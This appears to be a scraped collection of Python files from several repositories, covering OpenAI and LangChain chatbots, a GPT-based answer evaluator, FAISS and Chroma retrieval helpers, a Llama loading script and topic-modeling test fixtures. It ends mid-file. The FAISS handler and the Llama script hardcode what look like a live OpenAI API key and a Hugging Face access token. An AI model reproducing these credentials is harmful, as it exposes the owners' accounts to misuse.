response = openai.Completion.create(
engine="gpt-3.5-turbo-instruct", # You can choose the engine that suits your needs
prompt=prompt,
max_tokens=50, # Adjust the max_tokens as needed
n=1 # You can generate multiple responses and choose the best one if needed
)
elif language == "Twi":
response = twi_dict.get(user_input)
elif language == "Ewe":
response = ewe_dict.get(user_input)
chatbot_reply = ""
if language == "English":
chatbot_reply = response.choices[0].text.strip()
else:
chatbot_reply = response
audio_response_path = ""
if input_type == "voice":
audio_response_path = text_to_audio(chatbot_reply, language)
elif input_type == "text":
audio_response_path = chatbot_reply
return audio_response_path
def text_to_audio(text, language):
# Convert the chatbot response text to an audio file
final_audio_response_path = ""
if language == "English":
final_audio_response_path = text_to_audio_en(text)
elif language == "Twi":
timestamp = datetime.now().strftime("%Y%m%d%H%M%S")
audio_response_filename = f"audio_response_{timestamp}.mp3"
# Define the full path to save the audio file in the media directory
audio_response_path = os.path.join(
settings.MEDIA_ROOT, audio_response_filename)
# api = TTS("tts_models/tw_asante/openbible/vits")
speaker_encoder_twi = speaker_encoder_model_twi
# speaker_encoder_ewe = speaker_encoder_model_ewe
# speaker_encoder_twi.tts_with_vc_to_file(
# text,
# speaker_wav="/Users/m1macbookpro2020/Desktop/samuel/final year project/VCABuddy/chat/speaker.mp3",
# file_path=audio_response_path
# )
speaker_encoder_twi.tts_to_file(
text,
# speaker_wav="/Users/m1macbookpro2020/Desktop/samuel/final year project/VCABuddy/chat/speaker.mp3",
file_path=audio_response_path
)
final_audio_response_path = os.path.relpath(
audio_response_path, settings.MEDIA_ROOT)
elif language == "Ewe":
timestamp = datetime.now().strftime("%Y%m%d%H%M%S")
audio_response_filename = f"audio_response_{timestamp}.mp3"
# Define the full path to save the audio file in the media directory
audio_response_path = os.path.join(
settings.MEDIA_ROOT, audio_response_filename)
# api = TTS("tts_models/tw_asante/openbible/vits")
speaker_encoder_ewe = speaker_encoder_model_ewe
# speaker_encoder_ewe = speaker_encoder_model_ewe
speaker_encoder_ewe.tts_to_file(
text,
# speaker_wav="/Users/m1macbookpro2020/Desktop/samuel/final year project/VCABuddy/chat/speaker.mp3",
file_path=audio_response_path
)
# speaker_encoder_ewe.tts_with_vc_to_file(
# text,
# speaker_wav="/Users/m1macbookpro2020/Desktop/samuel/final year project/VCABuddy/chat/speaker.mp3",
# file_path=audio_response_path
# )
final_audio_response_path = os.path.relpath(
audio_response_path, settings.MEDIA_ROOT)
# Return the relative path to the audio file
return final_audio_response_path
def text_to_audio_en(text):
# Convert the chatbot response text to an audio file
timestamp = datetime.now().strftime("%Y%m%d%H%M%S")
audio_response_filename = f"audio_response_{timestamp}.mp3"
# Define the full path to save the audio file in the media directory
audio_response_path = os.path.join(
settings.MEDIA_ROOT, audio_response_filename)
audio_response = gTTS(text)
audio_response.save(audio_response_path)
# Return the relative path to the audio file
return os.path.relpath(audio_response_path, settings.MEDIA_ROOT)
if __name__ == "__main__":
# Replace with the user's text input
user_input = "Hello, chatbot. How can I assist you?"
chatbot = Chatbot()
chatbot_response = chatbot.get_response(user_input)
audio_response_path = text_to_audio(chatbot_response)
# Now you can send the 'audio_response_path' to the frontend for playback.
| [
"PLACEHOLDER\nLanguage: PLACEHOLDER\nUser Input: PLACEHOLDER\nResponse:"
] |
2024-01-10 | xieyxclack/data-juicer | tools~evaluator~gpt_eval~gpt_evaluator.py | # Some code here has been modified from:
# https://github.com/lm-sys/FastChat
# --------------------------------------------------------
import jsonlines
import openai
import logging
import time
import argparse
import yaml
import os
from multiprocessing import Pool
from tqdm import tqdm
logger = logging.getLogger(__name__)
logging.basicConfig(level=logging.INFO)
def parse_args():
parser = argparse.ArgumentParser()
parser.add_argument('--config', type=str, required=True,
help="Config file path")
parser.add_argument('--worker-num', type=int, default=4,
help="Number of workers for OpenAI API")
parser.add_argument("--max-retry", type=int, default=5,
help='Retry times for OpenAI API')
parser.add_argument("--debug", action='store_true',
help='Run without calling OpenAI API')
return parser.parse_args()
class GPTEvaluator():
def __init__(self, config):
openai.organization = config['openai_organization']
openai.api_key = config['openai_api_key']
self.questions = [q for q in jsonlines.open(
config['question_file'], 'r')]
self.answers = [a for a in jsonlines.open(
config['answer_file'], 'r')]
self.baseline = [b for b in jsonlines.open(
config['baseline_file'], 'r')]
self.prompt_templates = {
p['category']: p for p in jsonlines.open(config['prompt_file'], 'r')}
self.reviewers = {
z['category']: z for z in jsonlines.open(config['reviewer_file'], 'r')}
if not os.path.exists(os.path.dirname(config['result_file'])):
os.makedirs(os.path.dirname(config['result_file']))
self.result_writer = jsonlines.open(
config['result_file'], 'w', flush=True)
self.worker_num = config['worker_num'] if 'worker_num' in config else 4
self.max_retry = config['max_retry'] if 'max_retry' in config else 5
self.debug = config['debug'] if 'debug' in config else False
def generate_prompt(self, question, answer, baseline, prompts):
if question['category'] in self.reviewers.keys():
reviewer = self.reviewers[question['category']]
prompt_json = prompts[question['category']]
else:
reviewer = self.reviewers['general']
prompt_json = prompts['general']
sys_prompt = prompt_json["system_prompt"]
prompt_template = prompt_json["prompt_template"]
defaults = prompt_json["defaults"]
prompt1 = prompt_template.format(
question=question['text'], answer_1=answer['text'], answer_2=baseline['text'], **defaults
)
prompt2 = prompt_template.format(
question=question['text'], answer_1=baseline['text'], answer_2=answer['text'], **defaults
)
return sys_prompt, prompt1, prompt2, reviewer
def parse_score(self, review):
review = review.strip('\n')
score_pair = review.split("\n")[-1]
score_pair.strip()
sp = score_pair.split(",")
try:
if len(sp) == 2:
return [float(sp[0]), float(sp[1])]
else:
logger.error(
f"Invalid score pair."
)
return [0, 0]
except Exception as e:
logger.error("Invalid answer")
return [0, 0]
def run(self):
results = []
requests = []
question_num = len(self.questions)
for i in range(question_num):
sys_prompt, prompt1, prompt2, reviewer = self.generate_prompt(
self.questions[i], self.answers[i], self.baseline[i], self.prompt_templates)
results.append({
'question_id': self.questions[i]['question_id'],
'metadata': reviewer['metadata'],
'model1': self.answers[i]['model_id'],
'model2': self.baseline[i]['model_id']
})
pool = Pool(processes=self.worker_num)
requests.append({
'sys_prompt': sys_prompt, 'user_prompt': prompt1, 'temperature': reviewer['metadata']['temperature'], 'max_tokens': reviewer['metadata']['max_tokens'], 'model': reviewer['metadata']['model'], 'debug': self.debug, 'retry': self.max_retry})
requests.append({
'sys_prompt': sys_prompt, 'user_prompt': prompt2, 'temperature': reviewer['metadata']['temperature'], 'max_tokens': reviewer['metadata']['max_tokens'], 'model': reviewer['metadata']['model'], 'debug': self.debug, 'retry': self.max_retry})
reviews = pool.map(eval, requests)
target_score = 0.0
baseline_score = 0.0
cnt = 0
for i, review in enumerate(tqdm(reviews)):
scores = self.parse_score(review)
idx = i // 2
if i % 2 == 0:
results[idx]['review1'] = review
results[idx]['score1'] = scores
target_score += scores[0]
baseline_score += scores[1]
else:
results[idx]['review2'] = review
results[idx]['score2'] = scores
target_score += scores[1]
baseline_score += scores[0]
self.result_writer.write(results[idx])
cnt += 1
target_avg_score = target_score / cnt / 2
baseline_avg_score = baseline_score / cnt / 2
print("-------------------------")
print(f"> {results[0]['model1']}: {target_avg_score}")
print(f"> {results[0]['model2']}: {baseline_avg_score}")
print("-------------------------")
self.result_writer.write({
f"{results[0]['model1']}": target_avg_score,
f"{results[0]['model2']}": baseline_avg_score
})
self.result_writer.close()
def eval(request):
if request['debug']:
logger.info(f"Fake response {request['user_prompt']}")
return "Fake response\n10,9\n"
for _ in range(request['retry']):
try:
response = openai.ChatCompletion.create(
model=request['model'],
messages=[
{"role": "system", "content": request['sys_prompt']},
{
"role": "user",
"content": request['user_prompt'],
},
],
temperature=request['temperature'],
max_tokens=request['max_tokens'],
)
content = response["choices"][0]["message"]["content"]
logger.info(content)
return content
except Exception as e:
logger.error(e)
time.sleep(5)
logger.error(f"Failed after {request['retry']} retries.")
return "error"
if __name__ == "__main__":
args = parse_args()
config = yaml.safe_load(open(args.config, 'r', encoding='utf-8'))['gpt_evaluation']
config['worker_num'] = args.worker_num
config['max_retry'] = args.max_retry
config['debug'] = args.debug
evaluator = GPTEvaluator(config)
evaluator.run()
| [
"user_prompt",
"general",
"sys_prompt",
"prompt_template",
"system_prompt"
] |
2024-01-10 | chelleai/lloom | lloom~dataset~textfile_dataset.py | import glob
import uuid
from chromadb.api import Collection
from langchain.text_splitter import RecursiveCharacterTextSplitter
class TextfileDataset:
def __init__(
self,
source: str,
tokens_per_document: int,
token_overlap: int,
collection: Collection,
count: int = None,
):
self.source = source
self.tokens_per_document = tokens_per_document
self.token_overlap = token_overlap
self.collection = collection
self.count = count
def load(self):
file_paths = glob.glob(self.source)
if not file_paths:
raise ValueError("No files found matching the provided glob pattern.")
ids = []
for file_path in file_paths:
with open(file_path, "r") as file:
document_text = file.read()
splitter = RecursiveCharacterTextSplitter(
chunk_size=self.tokens_per_document,
chunk_overlap=self.token_overlap,
length_function=len,
add_start_index=True,
)
document_texts = splitter.split_text(
text=document_text,
)
ids += [str(uuid.uuid4()) for _ in range(len(document_texts))]
self.collection.add(ids=ids, documents=document_texts)
return ids
| [] |
2024-01-10 | chelleai/lloom | tests~test_parser.py | from chromadb.utils.embedding_functions import OpenAIEmbeddingFunction
from lloom import Migration
from lloom.dataset.textfile_dataset import TextfileDataset
def test_migration():
m = Migration(file_path="tests/sotu-small.yml")
m.run_migration()
assert isinstance(m.datasets["sotu_raw"], TextfileDataset)
assert m.stores["sotu_db"].count() == 1
coll = m.stores["sotu_db"]
assert isinstance(coll._embedding_function, OpenAIEmbeddingFunction)
| [] |
2024-01-10 | Dev-Khant/tell-what-a-video-does | process~qa_bot.py | import logging
from langchain.docstore.document import Document
from langchain.text_splitter import CharacterTextSplitter
from langchain.embeddings import OpenAIEmbeddings
from langchain.vectorstores import Chroma
from langchain.chat_models import ChatOpenAI
from langchain.chains import RetrievalQA
from langchain.prompts import PromptTemplate
logging.basicConfig(level=logging.INFO)
logger = logging.getLogger("Q&A")
class QA_Bot:
def __init__(self, openai_key):
self.openai_key = openai_key
self.llm = ChatOpenAI(
temperature=0.3, model_name="gpt-3.5-turbo", openai_api_key=openai_key
)
self.agent = None
def store_in_vectordb(self, explanation):
document = Document(page_content=explanation)
text_splitter = CharacterTextSplitter(chunk_size=100, chunk_overlap=10)
chunked_documents = text_splitter.split_documents([document])
logger.info("Documents ready")
vectordb = Chroma.from_documents(
chunked_documents,
embedding=OpenAIEmbeddings(openai_api_key=self.openai_key),
persist_directory="./data",
)
vectordb.persist()
logger.info("Documents inserted to vectordb")
self.agent = RetrievalQA.from_chain_type(
llm=self.llm,
retriever=vectordb.as_retriever(search_kwargs={"k": 3}),
)
logger.info("Agent ready!!")
def retrieve(self, query):
result = self.agent({"query": query}, return_only_outputs=True)
logger.info("Result ready!")
return result["result"]
| [] |
2024-01-10 | dmussaku/rates-chatgpt | rates~clients.py | import json
from typing import Dict
import openai
from django.conf import settings
from .models import ContainerTypes
class OpenAIClient(object):
def __init__(self):
openai.api_key = settings.OPENAI_API_KEY
def create_context(self):
container_types = ContainerTypes.choices
default_container_type = ContainerTypes.TWENTY_FOOTER
return f"""
Context:
We are a global logistics company that transports containers over sea.
Return me only a json with the following format:
- pol: Find the closest sea port of leave and return an object of the following format:
- name: name of the port
- code: UN/LOCODE of the port
- country_code: ISO 3166-1 alpha-2 country code
- pod: Find the closest sea port of destination and return an object of the following format:
- name: name of the port
- code: UN/LOCODE of the port
- country_code: ISO 3166-1 alpha-2 country code
- containers: list of objects of the following format:
- amount: integer Amount of containers, 1 by default
- type: string enumerated from the following values: {container_types}. {default_container_type} by default
- goods_names: Array of strings. names of the goods. [] by default
- is_dangerous: boolean field, false by default. Dangerous goods are considered dangerous when transporting via sea.
- is_hazardous: boolean field, false by default. Hazardous materials such as explosives, flammable liquids and gases, and toxic substances are considered dangerous when transporting via sea.
- is_customs_needed: boolean field, false by default. Indicate whether any of the goods require customs clearance.
- is_fragile: boolean field, false by default. Indicate whether any of the goods are fragile.
Don't add any other fields to the json sturcture from the question. Make sure the structure from the context is maintained.
"""
def get_answer(self, question) -> Dict:
context = self.create_context()
prompt = f"Question: {question}\n{context}"
print(prompt)
response = openai.Completion.create(
model="text-davinci-003",
prompt=prompt,
temperature=0.9,
max_tokens=512,
top_p=1,
frequency_penalty=0,
presence_penalty=0,
)
print("-" * 80)
print(response)
print("-" * 80)
text = response.choices[0]["text"].replace("\n", "")
if text.startswith("Answer:"):
text = text.strip("Answer:")
json_response = json.loads(text.strip())
print(json_response)
print("-" * 80)
return json_response
| [
"Question: PLACEHOLDER\nPLACEHOLDER"
] |
2024-01-10 | shubhagrawal30/FAST | FASTphysics~tutor~tutor.py | from openai import OpenAI
import os, sys
import streamlit as st
from . import prompts
client = OpenAI(api_key=st.secrets["OPENAI_API_KEY"])
class Tutor():
def __init__(self):
p = prompts.Prompts()
self.subject = p.SUBJECT()
self.history = [{"role": "system", "content": p.INIT_PROMPT()}, \
{"role": "user", "content": p.FIRST_PROMPT()}]
def ask(self, question): # method is a generator method to allow streaming OpenAI responses
question = {"role": "user", "content": question}
self.history.append(question)
response = client.chat.completions.create(model="gpt-4", messages=self.history, stream=True)
collect_msgs = ""
for chunk in response:
msg = chunk.choices[0].delta.content or ""
collect_msgs += msg
yield msg
self.history.append({"role": "assistant", "content": collect_msgs})
| [] |
2024-01-10 | rohanpatankar926/chatbot-client | fasiss_handlers.py | from langchain.vectorstores import FAISS
from langchain.text_splitter import RecursiveCharacterTextSplitter
from langchain.llms import OpenAI
from langchain.chains import RetrievalQA
from langchain.embeddings.openai import OpenAIEmbeddings
from dotenv import load_dotenv
from tqdm import tqdm
import hashlib
load_dotenv()
from langchain.document_loaders import PDFMinerLoader
from utils import config_loader
from langchain.chains.question_answering import load_qa_chain
class Document:
def __init__(self, page_content, metadata):
self.page_content = page_content
self.metadata = metadata
def __call__(self):
return f"Document(page_content={self.page_content},metadata={self.metadata})"
def get_pagecontent(self):
return self.page_content
def get_metadata(self):
return self.get_metadata
def pdf_to_json_and_insert(filepath):
documents=[]
loader = PDFMinerLoader(filepath)
docs = loader.load()
text_splitter = RecursiveCharacterTextSplitter(
chunk_size=1000,
chunk_overlap=200,
length_function = len,
separators=["\n\n", "\n", " ", ""],
)
m = hashlib.md5() # this will convert URL into unique ID
for doc in tqdm(docs):
url = doc.metadata["source"].split("/")[-1]
m.update(url.encode("utf-8"))
chunks = text_splitter.split_text(doc.page_content)
for i, chunk in enumerate(chunks):
doc = Document(page_content=chunk, metadata={"source":url})
documents.append(
doc
)
embedding = openai_embedding()
global knowledge_base
knowledge_base = FAISS.from_documents(documents=documents,
embedding=embedding)
return knowledge_base
def openai_embedding():
model_name = config_loader["openai_embedding_model"]
embed = OpenAIEmbeddings(
model=model_name,
openai_api_key="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",
)
return embed
def retriever_faiss(query):
retrieve=knowledge_base.similarity_search(query=query)
llm = OpenAI(openai_api_key="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")
chain = load_qa_chain(llm, chain_type='map_rerank')
return chain.run(input_documents=retrieve, question=query)
| [] |
2024-01-10 | rohanpatankar926/chatbot-client | llama-2.py | from torch import cuda, bfloat16
import transformers
model_id = 'decapoda-research/llama-7b-hf'
device = f'cuda:{cuda.current_device()}' if cuda.is_available() else 'cpu'
# set quantization configuration to load large model with less GPU memory
# this requires the `bitsandbytes` library
bnb_config = transformers.BitsAndBytesConfig(
load_in_4bit=True,
bnb_4bit_quant_type='nf4',
bnb_4bit_use_double_quant=True,
bnb_4bit_compute_dtype=bfloat16
)
# begin initializing HF items, you need an access token
hf_auth = "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"
model_config = transformers.AutoConfig.from_pretrained(
model_id,
use_auth_token=True,
)
model = transformers.AutoModelForCausalLM.from_pretrained(
model_id,
trust_remote_code=True,
config=model_config,
quantization_config=bnb_config,
device_map='auto',
use_auth_token=hf_auth,
)
# enable evaluation mode to allow model inference
model.eval()
print(f"Model loaded on {device}")
tokenizer = transformers.AutoTokenizer.from_pretrained(
model_id,
use_auth_token=hf_auth
)
stop_list = ['\nHuman:', '\n```\n']
stop_token_ids = [tokenizer(x)['input_ids'] for x in stop_list]
stop_token_ids
import torch
stop_token_ids = [torch.LongTensor(x).to(device) for x in stop_token_ids]
stop_token_ids
from transformers import StoppingCriteria, StoppingCriteriaList
# define custom stopping criteria object
class StopOnTokens(StoppingCriteria):
def __call__(self, input_ids: torch.LongTensor, scores: torch.FloatTensor, **kwargs) -> bool:
for stop_ids in stop_token_ids:
if torch.eq(input_ids[0][-len(stop_ids):], stop_ids).all():
return True
return False
stopping_criteria = StoppingCriteriaList([StopOnTokens()])
generate_text = transformers.pipeline(
model=model,
tokenizer=tokenizer,
return_full_text=True, # langchain expects the full text
task='text-generation',
# we pass model parameters here too
stopping_criteria=stopping_criteria, # without this model rambles during chat
temperature=0.1, # 'randomness' of outputs, 0.0 is the min and 1.0 the max
max_new_tokens=512, # max number of tokens to generate in the output
repetition_penalty=1.1 # without this output begins repeating
)
res = generate_text("Explain me the difference between Data Lakehouse and Data Warehouse.")
print(res[0]["generated_text"])
from langchain.llms import HuggingFacePipeline
llm = HuggingFacePipeline(pipeline=generate_text)
# checking again that everything is working fine
print(llm(prompt="Explain me the difference between Data Lakehouse and Data Warehouse."))
| [] |
2024-01-10 | boromir674/topic-modeling-toolkit | tests~conftest.py | import os
import sys
from configparser import ConfigParser
import pytest
from functools import reduce
from collections import Counter, OrderedDict
from topic_modeling_toolkit.patm import CoherenceFilesBuilder, TrainerFactory, Experiment, Tuner, PipeHandler, political_spectrum as political_spectrum_manager
# import topic_modeling_toolkit as tmtk
#
# from tmtk.patm import CoherenceFilesBuilder, TrainerFactory, Experiment, Tuner, PipeHandler
#
# from tmtk.patm import political_spectrum as political_spectrum_manager
from topic_modeling_toolkit.processors import Pipeline
# from tmtk.processors import Pipeline
from topic_modeling_toolkit.reporting import GraphMaker, TopicsHandler, DatasetReporter, ResultsHandler
from topic_modeling_toolkit.results import ExperimentalResults
####################3
MODULE_DIR = os.path.dirname(os.path.realpath(__file__))
DATA_DIR = os.path.join(MODULE_DIR, 'data')
TRAIN_CFG = os.path.join(MODULE_DIR, 'test-train.cfg')
REGS_CFG = os.path.join(MODULE_DIR, 'test-regularizers.cfg')
TEST_COLLECTIONS_ROOT_DIR_NAME = 'unittests-collections'
TEST_COLLECTION = 'unittest-dataset'
MODEL_1_LABEL = 'test-model'
TUNE_LABEL_PREFIX = 'unittest'
#####################
@pytest.fixture(scope='session')
def unittests_data_dir():
return DATA_DIR
@pytest.fixture(scope='session')
def collections_root_dir(tmpdir_factory):
return str(tmpdir_factory.mktemp(TEST_COLLECTIONS_ROOT_DIR_NAME))
@pytest.fixture(scope='session')
def test_collection_name():
return TEST_COLLECTION
#
@pytest.fixture(scope='session')
def rq1_cplsa_results_json(unittests_data_dir):
"""These are the results gathered for a cplsa trained model"""
return os.path.join(unittests_data_dir, 'cplsa100000_0.2_0.json')
@pytest.fixture(scope='session')
def test_collection_dir(collections_root_dir, test_collection_name, tmpdir_factory):
if not os.path.isdir(os.path.join(collections_root_dir, test_collection_name)):
os.mkdir(os.path.join(collections_root_dir, test_collection_name))
return os.path.join(collections_root_dir, test_collection_name)
# return str(tmpdir_factory.mktemp(os.path.join(collections_root_dir, test_collection_name)))
# return os.path.join(collections_root_dir, TEST_COLLECTION)
@pytest.fixture(scope='session')
def results_handler(collections_root_dir):
return ResultsHandler(collections_root_dir, results_dir_name='results')
@pytest.fixture(scope='session')
def pairs_file_nb_lines(): # number of lines in cooc and ppmi files. Dirty code to support python 2 backwards compatibility
python3 = {True: [1215, 1347], # second value is expected in travis build with python3
False: [1255]}
return python3[2 < sys.version_info[0]]
@pytest.fixture(scope='session')
def pipe_n_quantities(test_collection_dir, pairs_file_nb_lines):
return {'unittest-pipeline-cfg': os.path.join(MODULE_DIR, 'test-pipeline.cfg'),
'unittest-collection-dir': test_collection_dir,
'category': 'posts',
'sample': 200,
'resulting-nb-docs': 200,
'nb-bows': 2765,
'word-vocabulary-length': 1347,
'nb-all-modalities-terms': 1348, # corresponds to the number of lines in the vocabulary file created (must call persist of PipeHandler with add_class_labels_to_vocab=True, which is the default).
# the above probably will fail in case no second modality is used (only the @default_class is enabled)
'nb-lines-cooc-n-ppmi-files': pairs_file_nb_lines
}
@pytest.fixture(scope='session')
def political_spectrum():
return political_spectrum_manager
#### OPERATIONS ARTIFACTS
@pytest.fixture(scope='session')
def preprocess_phase(pipe_n_quantities):
pipe_handler = PipeHandler()
pipe_handler.process(pipe_n_quantities['unittest-pipeline-cfg'], pipe_n_quantities['category'], sample=pipe_n_quantities['sample'])
return pipe_handler
@pytest.fixture(scope='session')
def test_dataset(preprocess_phase, political_spectrum, test_collection_dir):
"""A dataset ready to be used for topic modeling training. Depends on the input document sample size to take and resulting actual size"""
text_dataset = preprocess_phase.persist(test_collection_dir, political_spectrum.poster_id2ideology_label, political_spectrum.class_names, add_class_labels_to_vocab=True)
coh_builder = CoherenceFilesBuilder(test_collection_dir)
coh_builder.create_files(cooc_window=10, min_tf=0, min_df=0, apply_zero_index=False)
return text_dataset
# PARSE UNITTEST CFG FILES
def parse_cfg(cfg):
config = ConfigParser()
config.read(cfg)
return {section: dict(config.items(section)) for section in config.sections()}
@pytest.fixture(scope='session')
def train_settings():
"""These settings (learning, reg components, score components, etc) are used to train the model in 'trained_model' fixture. A dictionary of cfg sections mapping to dictionaries with settings names-values pairs."""
_ = parse_cfg(TRAIN_CFG)
_['regularizers'] = {k: v for k, v in _['regularizers'].items() if v}
_['scores'] = {k: v for k, v in _['scores'].items() if v}
return _
@pytest.fixture(scope='session')
def trainer(collections_root_dir, test_dataset):
return TrainerFactory().create_trainer(os.path.join(collections_root_dir, test_dataset.name), exploit_ideology_labels=True, force_new_batches=True)
@pytest.fixture(scope='session')
def trained_model_n_experiment(collections_root_dir, test_dataset, trainer):
experiment = Experiment(os.path.join(collections_root_dir, test_dataset.name))
topic_model = trainer.model_factory.create_model(MODEL_1_LABEL, TRAIN_CFG, reg_cfg=REGS_CFG, show_progress_bars=False)
train_specs = trainer.model_factory.create_train_specs()
trainer.register(experiment)
experiment.init_empty_trackables(topic_model)
trainer.train(topic_model, train_specs, effects=False, cache_theta=True)
experiment.save_experiment(save_phi=True)
return topic_model, experiment
@pytest.fixture(scope='session')
def loaded_model_n_experiment(collections_root_dir, test_dataset, trainer, trained_model_n_experiment):
model, experiment = trained_model_n_experiment
experiment.save_experiment(save_phi=True)
new_exp_obj = Experiment(os.path.join(collections_root_dir, test_dataset.name))
trainer.register(new_exp_obj)
loaded_model = new_exp_obj.load_experiment(model.label)
return loaded_model, new_exp_obj
@pytest.fixture(scope='session')
def training_params():
return [
('nb-topics', [10, 12]),
('collection-passes', 4),
('document-passes', 1),
('background-topics-pct', 0.2),
('ideology-class-weight', 1),
('default-class-weight', 1)
]
@pytest.fixture(scope='session')
def expected_explorable_params(training_params, regularizers_specs):
return [(k, v) for k, v in training_params if type(v) == list and len(v) != 1] + [('{}.{}'.format(k, param), value) for k, v in regularizers_specs for param, value in v if type(value) == list and len(value) != 1]
@pytest.fixture(scope='session')
def expected_constant_params(training_params, regularizers_specs):
return [(k, v) for k, v in training_params if type(v) != list or len(v) == 1] + [('{}.{}'.format(k, param), value) for k, v in regularizers_specs for param, value in v if type(value) != list or len(value) == 1]
@pytest.fixture(scope='session')
def regularizers_specs():
return [
('label-regularization-phi-dom-cls', [('tau', 1e5)]),
('decorrelate-phi-dom-def', [('tau', 1e4)])
]
@pytest.fixture(scope='session')
def tuning_parameters():
return dict(prefix_label=TUNE_LABEL_PREFIX,
# append_explorables=True,
# append_static=True,
force_overwrite=True,
cache_theta=True, verbose=False, interactive=False,
labeling_params=['nb-topics', 'background-topics-pct', 'collection-passes', 'document-passes', 'ideology-class-weight'],
preserve_order=False,
# parameter_set='training|regularization'
)
@pytest.fixture(scope='session')
def model_names(tuning_parameters, training_params, expected_labeling_parameters):
"""alphabetically sorted expected model names to persist (phi and results)"""
def _mock_label(labeling, params_data):
inds = Counter()
params_data = OrderedDict(params_data)
for l in labeling:
if type(params_data[l]) != list or len(params_data[l]) == 1:
yield params_data[l]
else:
inds[l] += 1
yield params_data[l][inds[l] - 1]
nb_models = reduce(lambda k,l: k*l, [len(span) if type(span) == list else 1 for _, span in training_params])
prefix = ''
if tuning_parameters['prefix_label']:
prefix = tuning_parameters['prefix_label'] + '_'
return sorted([prefix + '_'.join(str(x) for x in _mock_label(expected_labeling_parameters, training_params)) for _ in range(nb_models)])
@pytest.fixture(scope='session')
def expected_labeling_parameters(tuning_parameters, training_params, expected_constant_params, expected_explorable_params):
static_flag = {True: [x[0] for x in expected_constant_params],
False: []}
explorable_flag = {True: [x[0] for x in expected_explorable_params],
False: []}
if tuning_parameters['labeling_params']:
labeling_params = tuning_parameters['labeling_params']
else:
labeling_params = static_flag[tuning_parameters['append_static']] + explorable_flag[tuning_parameters['append_explorables']]
if tuning_parameters['preserve_order']:
return [x for x in training_params if x in labeling_params]
return labeling_params
@pytest.fixture(scope='session')
def tuner_obj(collections_root_dir, test_dataset, training_params, regularizers_specs, tuning_parameters):
tuner = Tuner(os.path.join(collections_root_dir, test_dataset.name), {
'perplexity': 'per',
'sparsity-phi-@dc': 'sppd',
'sparsity-theta': 'spt',
'topic-kernel-0.60': 'tk60',
'topic-kernel-0.80': 'tk80',
'top-tokens-10': 'top10',
'top-tokens-100': 'top100',
'background-tokens-ratio-0.3': 'btr3',
'background-tokens-ratio-0.2': 'btr2'
})
tuner.training_parameters = training_params
tuner.regularization_specs = regularizers_specs
tuner.tune(**tuning_parameters)
return tuner
@pytest.fixture(scope='session')
def dataset_reporter(tuner_obj):
return DatasetReporter(os.path.dirname(tuner_obj.dataset))
@pytest.fixture(scope='session')
def graphs_parameters():
return {'selection': 3,
'metric': 'alphabetical',
'score_definitions': ['background-tokens-ratio-0.30', 'kernel-coherence-0.80', 'sparsity-theta', 'top-tokens-coherence-10'],
'tau_trajectories': '',
# 'tau_trajectories': 'all',
}
@pytest.fixture(scope='session')
def graphs(exp_res_obj1, trained_model_n_experiment, tuner_obj, graphs_parameters):
graph_maker = GraphMaker(os.path.dirname(tuner_obj.dataset))
sparser_regularizers_tau_coefficients_trajectories = False
selection = graphs_parameters.pop('selection')
graph_maker.build_graphs_from_collection(os.path.basename(tuner_obj.dataset), selection, # use a maximal number of 8 models to compare together
**dict({'save': True, 'nb_points': None, 'verbose': False}, **graphs_parameters))
graphs_parameters['selection'] = selection
return graph_maker.saved_figures
############################################
@pytest.fixture(scope='session')
def json_path(collections_root_dir, test_collection_name):
return os.path.join(collections_root_dir, test_collection_name, 'results', 'toy-exp-res.json')
@pytest.fixture(scope='session')
def kernel_data_0():
return [
[[1, 2], [3, 4], [5, 6], [120, 100]],
{'t01': {'coherence': [1, 2, 3],
'contrast': [6, 3],
'purity': [1, 8]},
't00': {'coherence': [10, 2, 3],
'contrast': [67, 36],
'purity': [12, 89]},
't02': {'coherence': [10, 11],
'contrast': [656, 32],
'purity': [17, 856]}}
]
@pytest.fixture(scope='session')
def kernel_data_1():
return [[[10,20], [30,40], [50,6], [80, 90]], {'t01': {'coherence': [3, 9],
'contrast': [96, 3],
'purity': [1, 98]},
't00': {'coherence': [19,2,93],
'contrast': [7, 3],
'purity': [2, 89]},
't02': {'coherence': [0,11],
'contrast': [66, 32],
'purity': [17, 85]}
}]
@pytest.fixture(scope='session')
def exp_res_obj1(kernel_data_0, kernel_data_1, json_path, test_collection_dir):
exp = ExperimentalResults.from_dict({
'scalars': {
'dir': 'a-dataset-dir',
'label': 'toy-exp-res',
'dataset_iterations': 3, # LEGACY '_' (underscore) usage
'nb_topics': 5, # LEGACY '_' (underscore) usage
'document_passes': 2, # LEGACY '_' (underscore) usage
'background_topics': ['t0', 't1'], # LEGACY '_' (underscore) usage
'domain_topics': ['t2', 't3', 't4'], # LEGACY '_' (underscore) usage
'modalities': {'dcn': 1, 'icn': 5}
},
'tracked': {
'perplexity': [1, 2, 3],
'sparsity-phi-@dc': [-2, -4, -6],
'sparsity-phi-@ic': [-56, -12, -32],
'sparsity-theta': [2, 4, 6],
'background-tokens-ratio-0.3': [0.4, 0.3, 0.2],
'topic-kernel': {
'0.60': {
'avg_coh': kernel_data_0[0][0],
'avg_con': kernel_data_0[0][1],
'avg_pur': kernel_data_0[0][2],
'size': kernel_data_0[0][3],
'topics': kernel_data_0[1]
},
'0.80': {
'avg_coh': kernel_data_1[0][0],
'avg_con': kernel_data_1[0][1],
'avg_pur': kernel_data_1[0][2],
'size': kernel_data_1[0][3],
'topics': kernel_data_1[1]
}
},
'top-tokens': {
'10': {
'avg_coh': [5, 6, 7],
'topics': {'t01': [12, 22, 3], 't00': [10, 2, 3], 't02': [10, 11]}
},
'100': {
'avg_coh': [10, 20, 30],
'topics': {'t01': [5, 7, 9], 't00': [12, 32, 3], 't02': [11, 1]}
}
},
'tau-trajectories': {'phi': [1, 2, 3], 'theta': [5, 6, 7]},
'regularization-dynamic-parameters': {'type-a': {'tau': [1, 2, 3]},
'type-b': {'tau': [-1, -1, -2], 'alpha': [1, 1.2]}},
'collection-passes': [3]
},
'final': {
'topic-kernel': {
'0.60': {'t00': ['a', 'b', 'c'],
't01': ['d', 'e', 'f'],
't02': ['g', 'h', 'i']},
'0.80': {'t00': ['j', 'k', 'l'],
't01': ['m', 'n', 'o'],
't02': ['p', 'q', 'r']}
},
'top-tokens': {
'10': {
't00': ['s', 't', 'u'],
't01': ['v', 'x', 'y'],
't02': ['z', 'a1', 'b1']
},
'100': {
't00': ['c1', 'd1', 'e1'],
't01': ['f1', 'g1', 'h1'],
't02': ['i1', 'j1', 'k1']
}
},
'background-tokens': ['l1', 'm1', 'n1']
},
'regularizers': ['reg1_params_pformat', 'reg2_params_pformat'],
'reg_defs': {'type-a': 'reg1', 'type-b': 'reg2'},
